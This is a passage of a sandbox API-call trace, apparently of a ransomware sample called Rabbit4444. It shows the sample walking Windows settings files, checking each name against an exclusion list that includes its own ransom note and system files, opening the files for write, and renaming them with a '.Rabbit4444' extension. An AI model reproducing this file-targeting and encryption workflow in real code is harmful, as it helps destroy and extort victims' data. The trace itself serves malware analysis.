(lpString1="t-ms", lpString2=".lnk") returned 1 [0056.888] lstrlenW (lpString=".ini") returned 4 [0056.888] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.888] lstrlenW (lpString=".sys") returned 4 [0056.888] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.888] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagestoragesensesavelocations.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.889] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.889] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14819950206) returned 1 [0056.889] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1198) returned 1 [0056.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0056.889] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0056.889] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7b0, lpName=0x0) returned 0x298 [0056.890] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7b0) returned 0x70000 [0056.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.891] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14820202364) returned 1 [0056.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0056.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0056.891] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.891] CloseHandle (hObject=0x298) returned 1 [0056.892] CloseHandle (hObject=0x278) returned 1 [0056.892] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms.Rabbit4444") returned 187 [0056.892] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagestoragesensesavelocations.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStorageSenseSaveLocations.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagestoragesensesavelocations.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.892] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13d06901, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x13d06901, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238f74d9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x476, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", cAlternateFileName="AADC68~1.SET")) returned 1 [0056.892] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.892] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.892] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.892] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", lpString2=".") returned 1 [0056.892] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", lpString2="..") returned 1 [0056.893] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", lpString2="windows") returned -1 [0056.893] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.893] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.893] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", lpString2="boot") returned -1 [0056.893] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.893] lstrcmpiW (lpString1="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.893] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms" | out: lpString1="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms") returned="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms" [0056.893] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.893] lstrlenW (lpString="AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms") returned 61 [0056.893] lstrlenW (lpString="Rabbit4444") returned 10 [0056.893] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.893] lstrlenW (lpString=".dll") returned 4 [0056.893] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.893] lstrlenW (lpString=".lnk") returned 4 [0056.893] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.893] lstrlenW (lpString=".ini") returned 4 [0056.893] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.893] lstrlenW (lpString=".sys") returned 4 [0056.893] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.893] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagestoragesensestorageoverview.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.894] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.894] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14820442898) returned 1 [0056.894] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1142) returned 1 [0056.894] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.894] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0056.894] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0056.895] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0056.896] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.896] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.896] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.896] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0056.896] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.896] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0056.896] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.896] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.896] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14820691125) returned 1 [0056.896] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.896] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0056.896] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.896] CloseHandle (hObject=0x298) returned 1 [0056.896] CloseHandle (hObject=0x278) returned 1 [0056.896] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms.Rabbit4444") returned 189 [0056.897] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagestoragesensestorageoverview.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageStorageSenseStorageOverview.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagestoragesensestorageoverview.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.897] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14027a60, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x14027a60, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x40d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageThemes.settingcontent-ms", cAlternateFileName="AA43E2~1.SET")) returned 1 [0056.897] lstrcmpiW (lpString1="AAA_SettingsPageThemes.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.897] lstrcmpiW (lpString1="AAA_SettingsPageThemes.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.897] lstrcmpiW (lpString1="AAA_SettingsPageThemes.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.897] lstrcmpiW (lpString1="AAA_SettingsPageThemes.settingcontent-ms", lpString2=".") returned 1 [0056.897] lstrcmpiW (lpString1="AAA_SettingsPageThemes.settingcontent-ms", lpString2="..") returned 1 [0056.897] lstrcmpiW (lpString1="AAA_SettingsPageThemes.settingcontent-ms", lpString2="windows") returned -1 [0056.898] lstrcmpiW (lpString1="AAA_SettingsPageThemes.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.898] lstrcmpiW (lpString1="AAA_SettingsPageThemes.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.898] lstrcmpiW (lpString1="AAA_SettingsPageThemes.settingcontent-ms", lpString2="boot") returned -1 [0056.898] lstrcmpiW (lpString1="AAA_SettingsPageThemes.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.898] lstrcmpiW (lpString1="AAA_SettingsPageThemes.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.898] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageThemes.settingcontent-ms" | out: lpString1="AAA_SettingsPageThemes.settingcontent-ms") returned="AAA_SettingsPageThemes.settingcontent-ms" [0056.898] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageThemes.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.898] lstrlenW (lpString="AAA_SettingsPageThemes.settingcontent-ms") returned 40 [0056.898] lstrlenW (lpString="Rabbit4444") returned 10 [0056.898] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.898] lstrlenW (lpString=".dll") returned 4 [0056.898] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.898] lstrlenW (lpString=".lnk") returned 4 [0056.898] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.898] lstrlenW (lpString=".ini") returned 4 [0056.898] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.898] lstrlenW (lpString=".sys") returned 4 [0056.898] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.898] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageThemes.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagethemes.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.899] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.899] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14820941747) returned 1 [0056.899] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1037) returned 1 [0056.899] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0056.899] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0056.899] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0056.900] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0056.901] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.901] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.901] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.901] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.901] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.901] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.901] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.901] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.901] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14821186924) returned 1 [0056.901] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0056.901] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0056.901] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.901] CloseHandle (hObject=0x298) returned 1 [0056.901] CloseHandle (hObject=0x278) returned 1 [0056.901] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageThemes.settingcontent-ms.Rabbit4444") returned 168 [0056.901] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageThemes.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagethemes.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageThemes.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagethemes.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.902] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x142179b9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x142179b9, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x449, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", cAlternateFileName="AAC193~1.SET")) returned 1 [0056.902] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.902] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.902] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.902] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", lpString2=".") returned 1 [0056.902] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", lpString2="..") returned 1 [0056.902] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", lpString2="windows") returned -1 [0056.902] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.902] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.902] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", lpString2="boot") returned -1 [0056.902] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.902] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.902] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms" | out: lpString1="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms") returned="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms" [0056.902] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionDateTime.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.903] lstrlenW (lpString="AAA_SettingsPageTimeRegionDateTime.settingcontent-ms") returned 52 [0056.903] lstrlenW (lpString="Rabbit4444") returned 10 [0056.903] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.903] lstrlenW (lpString=".dll") returned 4 [0056.903] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.903] lstrlenW (lpString=".lnk") returned 4 [0056.903] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.903] lstrlenW (lpString=".ini") returned 4 [0056.903] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.903] lstrlenW (lpString=".sys") returned 4 [0056.903] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.903] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionDateTime.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagetimeregiondatetime.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.903] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.903] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14821408261) returned 1 [0056.903] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1097) returned 1 [0056.903] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0056.903] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0056.903] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.905] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.905] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.905] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.905] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.905] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.905] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.906] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14821653680) returned 1 [0056.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0056.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0056.906] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.906] CloseHandle (hObject=0x298) returned 1 [0056.906] CloseHandle (hObject=0x278) returned 1 [0056.906] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionDateTime.settingcontent-ms.Rabbit4444") returned 180 [0056.906] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionDateTime.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagetimeregiondatetime.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionDateTime.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagetimeregiondatetime.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.907] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1487fe5a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1487fe5a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233c02ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x449, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", cAlternateFileName="AA52B7~1.SET")) returned 1 [0056.907] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.907] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.907] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.907] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", 